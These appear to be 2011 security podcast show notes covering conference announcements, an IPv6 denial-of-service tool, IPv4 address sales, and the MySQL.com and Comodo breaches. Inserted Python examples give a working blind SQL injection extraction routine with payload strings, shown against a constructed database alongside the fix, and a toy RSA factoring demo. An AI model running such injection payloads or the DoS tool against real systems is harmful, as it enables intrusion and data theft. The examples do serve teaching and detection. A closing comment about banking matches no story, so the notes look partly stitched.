Announcements:
CarolinaCon
Where: Holiday Inn – Glenwood Avenue in Raleigh, NC
http://www.carolinacon.org/
SANS Mentor class
When: Thursday, May 5, 2011 – Thursday, July 7, 2011
Where: Federal Way, WA
http://www.sans.org/mentor/details.php?nid=24569
Discount Code: MRPOD10 for 10% savings
My Hard Drive Died
Data Recovery Expert Certification
When: June 6-10, 2011
Where: Atlanta, GA
http://www.myharddrivedied.com/data-recovery-training
BruCON
When: Sept 19-22, 2011
Where: Brussels, Belgium
http://blog.brucon.org/2011/02/confirmation-of-brucon-dates.html
CFP & CFT open now! http://blog.brucon.org/2011/01/brucon-call-for-papers-2011.html
DerbyCon
When: September 30 – October 2, 2011
Where: Louisville, KY
http://www.derbycon.com/
ISDpodcast Mailing List: http://groups.google.com/group/isdpodcast
Information Security Leaders Survey: https://www.surveymonkey.com/s/isl-2011-certsurvey
Hackers for Charity Cookbook is asking the hacker community to contribute their best recipes to be included in a Hackers Cookbook. ALL PROCEEDS GO TO HACKERS FOR CHARITY!!! 100%. Submit your best recipes to cookfu@304geeks.com for consideration. The first round of submissions is due by 4/1/2011.
Intro/Outro Music provided by JimmyZ (http://soundcloud.com/jimmyz)
Stories
Tool: IPv6 Denial of Service (DoS) Tool. http://isdpodcast.com/files/single_ra.tar.gz. Uses the THC IPv6 Attack Toolkit to generate single Router Advertisement (RA) messages, each with a different source address. Rather than flooding the network as flood_router6 does, it targets the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 to cause a denial of service (CPU consumption and system hang) by sending a smaller number of RAs at a slower rate. The original idea came from http://samsclass.info/ipv6/proj/proj8x-124-flood-router.htm. All we did was create the appropriate single_ra.c and slow_flood script. Because RAs are multicast to all nodes on the link (ff02::1), this affects every IPv6-enabled system on the local link.
Source: http://www.bbc.co.uk/news/technology-12859585
Source: http://blog.internetgovernance.org/blog/_archives/2011/3/23/4778509.html
Microsoft has offered to pay $7.5m (£4.7m) for net addresses from bankrupt telecoms firm Nortel. The 666,624 IP version 4 (IPv4) net addresses were put up for auction as part of the sell-off of Nortel's assets. Blocks of IPv4 are valuable because the pool of this generation of address is close to running dry. It was predicted that a market in IPv4 would appear among companies facing a costly migration to the newer IPv6.
Details of the sale were contained in papers filed to a Delaware bankruptcy court and show that Microsoft's bid was the highest of the 80 firms asked if they wanted to make an offer for the IP addresses.
The deal is yet to be approved by that court and anyone who objects to it can file their comments before 4 April.
If it goes through, Microsoft will get hold of 470,016 of the IP addresses instantly and the remaining 196,608 will be released as former customers of Nortel are moved to other telecoms firms.
IP addresses are used to identify individual computing devices on the internet and private networks.
IPv4 allows for a maximum of approximately 4.3 billion devices.
That number seemed enough in the early 1980s when the standard was first proposed, however the rapid growth in personal computers, smartphones and other internet connected devices means that addresses have been rapidly running out.
Net firms are in the process of moving to version 6 of the IP addressing scheme, which offers about 340 undecillion individual addresses (2^128, roughly 3.4 × 10^38).
However, the migration is happening very slowly.
In the interim, it is expected that IPv4 addresses will become increasingly valuable.
It is not clear why Microsoft wants to buy Nortel's supply, however many companies are keen to avoid the cost of changing their networking systems over to IPv6 compatible equipment.
The Microsoft-Nortel deal values the IPv4 addresses at $11.25 (£7) each, more than many firms charge for a .com domain. This was indicative, said experts, that the market for IPv4 addresses was heating up.
Registries that oversee the allocation of net addresses are also working on plans for a re-circulation system that takes IPv4 addresses from firms that are using IPv6 and releases them for use by others.
Geordy's comments: Supposedly IPv4 address blocks have not been recovered because it's a highly laborious task to do all of the proper checks to make sure the address is not in use, and that makes it cost prohibitive. Now looking at this though, if we are talking about $11.25 per address, I would guess that we could easily outsource the task abroad for a fraction of that cost. Is IPv6 the future, or is a cycle of address recovery and auctioning blocks off a reasonable stopgap measure for now? I almost missed this story, but when you stop and think about it for a minute, you realize this is the tip of a huge iceberg. Beyond that, shouldn't IANA be selling these addresses and not (what's left of) Nortel?
The European Commission, including the body's diplomatic arm, has been hit by what officials said Thursday was a serious cyberattack. The attack was first detected on Tuesday and commission sources have said that it was sustained and targeted.
External access to the commission's e-mail and intranet has been suspended and staff have been told to change their passwords in order to prevent the "disclosure of unauthorized information," according to an internal memo to staff. Staff at the commission, the European Union's executive and regulatory body, have also been told to send sensitive information via secure e-mail.
The event came just days ahead of the European Council summit being held on Thursday and Friday. The summit brings together the leaders of E.U. member states and crucial decisions will be made on economic strategy, the war in Libya and the future structure of the E.U.
This led to early speculation that the source of the attacks may be Libya, but the commission was quick to rule this out. The attack is thought to be similar to the cyberattack on the French government in the run-up to the G20 Summit in February 2010. That assault involved malware and targeted e-mail, with some of the related stolen information redirected to China.
Commission administration spokesman Antony Gravili said officials would not speculate on the source of the attacks in such a sensitive security matter. He did, however, confirm that the attackers targeted the information of some commission officials, in particular at the External Action Service, the body's foreign diplomatic arm.
"We are already taking urgent measures to tackle this. An inquiry's been launched. This isn't unusual as the Commission is frequently targeted," said Gravili. He added that there was no concrete evidence that the attack is linked to the E.U. summit.
Source: http://techie-buzz.com/tech-news/mysql-com-database-compromised-sql-injection.html
An email was sent out earlier today on the Full-Disclosure mailing list, detailing the compromise of numerous MySQL websites along with portions of their database containing usernames and passwords.
MySQL offers database software and services to enterprises as well as to online retailers, web forums and even governments. The attack, carried out using blind SQL injection against servers including MySQL.com, MySQL.fr, MySQL.de and MySQL.it, was initially found by "TinKode" and "Ne0h" of Slacker.Ro (according to their pastebin.com/BayvYdcP dump of the stolen credentials) but published by "Jackh4x0r".
The stolen database contains both member and employee email addresses and credentials, as well as tables with customer and partner information and internal network details. Hashes from the database have been posted, and some have already been cracked.
A submission to XSSed.com also details a cross-site scripting (XSS) vulnerability affecting MySQL.com that may have provided a secondary entry point for compromising visitors or employees of the organization since early January 2011.
This is definitely a shame for the folks behind MySQL, which was bought by Sun and later by Oracle (through the Sun acquisition). MySQL is used by millions of users for small and medium-sized databases, including by the popular blogging software WordPress.
The email sent to Full Disclosure lists all the databases, tables and even some password hashes for the users at MySQL.com. There has been no response from MySQL on this issue yet. We have contacted them for a comment and will update this post once more information becomes available.
This hack also compromised the database at Sun.com, more info on this at http://tinkode27.baywords.com/
More details are available here: http://blog.sucuri.net/2011/03/mysql-com-compromised.html
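As an added example (not code from MySQL.com or from the researchers named above), here is what a boolean-based blind SQL injection looks like end to end, against a constructed SQLite users table with two made-up rows: a lookup that concatenates user input into the query and only reveals whether a row matched, the extraction loop that turns that single bit into the admin's password hash, and the parameterized lookup that closes the hole. The table and column names, the hashes and the function names are assumptions for the demo; SQLite's unicode()/substr() stand in for MySQL's ORD()/SUBSTRING().

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not MySQL.com's schema): users and MD5 password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pwhash TEXT NOT NULL)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", "5f4dcc3b5aa765d61d8327deb882cf99"),   # md5("password")
        ("admin", "e10adc3949ba59abbe56e057f20f883e"),   # md5("123456")
    ])
    return db


def vulnerable_exists(db: sqlite3.Connection, name: str) -> bool:
    """The bug: user input is pasted into the SQL string. The caller only
    learns whether a row matched (True/False), which is all a blind injection needs."""
    sql = "SELECT 1 FROM users WHERE name = '%s'" % name
    return db.execute(sql).fetchone() is not None


def safe_exists(db: sqlite3.Connection, name: str) -> bool:
    """The fix: a bound parameter, so input can never change the query's structure."""
    return db.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone() is not None


def blind_extract(oracle, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction: recover the string `subquery` evaluates
    to, asking only yes/no questions through oracle(payload). One query checks
    that position `pos` exists, then a binary search over the code point (0..127,
    seven queries) pins down the character."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle("' OR length((%s)) >= %d -- " % (subquery, pos)):
            break                                   # ran past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("' OR unicode(substr((%s), %d, 1)) > %d -- " % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def demo() -> tuple:
    """Leak the admin hash through the vulnerable lookup; return (hash, request count)."""
    db = make_db()
    queries = []

    def oracle(payload: str) -> bool:
        queries.append(payload)                     # what the web log would show
        return vulnerable_exists(db, payload)

    leaked = blind_extract(oracle, "SELECT pwhash FROM users WHERE name = 'admin'")
    return leaked, len(queries)


if __name__ == "__main__":
    print(demo())
```

demo() returns the leaked hash and the number of requests it took (257 for a 32-character hash: one length probe plus seven binary-search probes per character). That request pattern is also the detection signature: a long burst of hits on one endpoint whose parameter carries OR, substr/SUBSTRING and an incrementing position, each answered with the same "found"/"not found" page.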
Source: http://www.geektech.in/archives/615
As H D Moore said on Twitter, either he is the hacker or a lunatic off his meds. For some reason, he sounds a lot like LIGATT in some of his sentences. For example:
"I’m not a group of hacker, I’m single hacker with experience of 1000 hackers, I’m single programmer with experience of 1000 programmers, I’m single planner/project manager with experience of 1000 project managers, so you are right, it’s managed by a group of hackers, but it was only I with experience of 1000."
Either someone with serious USI, or someone capable.
For me, though, this alone defeated his argument that he has the experience of a thousand hackers:
"It was not really a managed hack. At first I decided to hack RSA algorithm, I did too much investigation on SSL protocol, tried to find an algorithm for factoring integer, analyzed existing algorithms, for now I was not able to do so, at least not yet, but I know it’s not impossible and I’ll prove it."
Integer factorization is in NP (and in co-NP), but it is not known to be NP-complete, and no polynomial-time classical algorithm for it is known, which is why it is still considered a hard problem. So if he had really solved factoring, he would have broken RSA and most of the public-key cryptography the world relies on, and the Comodo hack would be the least of our problems.
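To make that point concrete, an added example (not from the article or from the Comodo attacker): a toy RSA key built from two small, constructed primes, and the few lines that turn a factorization of N into the private exponent and decrypt a ciphertext using nothing but the public key. Pollard's rho finds the factors of this 40-bit modulus instantly; the same routine is hopeless against a real 2048-bit modulus, which is exactly the gap between "I know it's not impossible" and having done it.

```python
import math
import random


def pollard_rho(n: int) -> int:
    """Return a nontrivial factor of composite n (Pollard's rho, f(x) = x^2 + c).
    Expected work is about sqrt(smallest prime factor) steps: ~1000 for the toy
    modulus below, ~2^512 for a 2048-bit RSA modulus with 1024-bit primes."""
    if n % 2 == 0:
        return 2
    while True:
        c = random.randrange(1, n)
        x = y = random.randrange(2, n)
        d = 1
        while d == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            d = math.gcd(abs(x - y), n)
        if d != n:                    # d == n means this c failed; try another
            return d


def private_exponent_from_factors(n: int, e: int) -> int:
    """Everything RSA's secrecy rests on: knowing p and q gives phi(n), and
    d is just the inverse of e modulo phi(n)."""
    p = pollard_rho(n)
    q = n // p
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)            # modular inverse (Python 3.8+)


# Constructed toy key: two well-known 20-bit primes. Real RSA primes are ~1024 bits.
P, Q = 1000003, 999983
N = P * Q                             # 999985999949
E = 65537


def break_toy_rsa(ciphertext: int) -> int:
    """Given only the public key (N, E) and a ciphertext, factor N and decrypt."""
    d = private_exponent_from_factors(N, E)
    return pow(ciphertext, d, N)


def demo() -> bool:
    m = 0xC0DE                        # constructed plaintext, must be < N
    c = pow(m, E, N)                  # what an eavesdropper sees
    return break_toy_rsa(c) == m


if __name__ == "__main__":
    print("recovered plaintext:", demo())
```

Factoring N is the whole attack here; nothing about SSL or the RSA algorithm itself needed "investigation". Try replacing P and Q with 512-bit primes and the rho loop simply never finishes, which is the state of the art he was claiming to have beaten.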
Geordy's comments: and this will keep happening over and over again until there is sufficient public outrage or federal regulation that leads to changing our broken banking system. It's amazing how little security there really is when it comes to something that all of us find as vitally important as our money. It's continually amazing that it's cheaper for the bank just to accept these losses than to work towards a solution.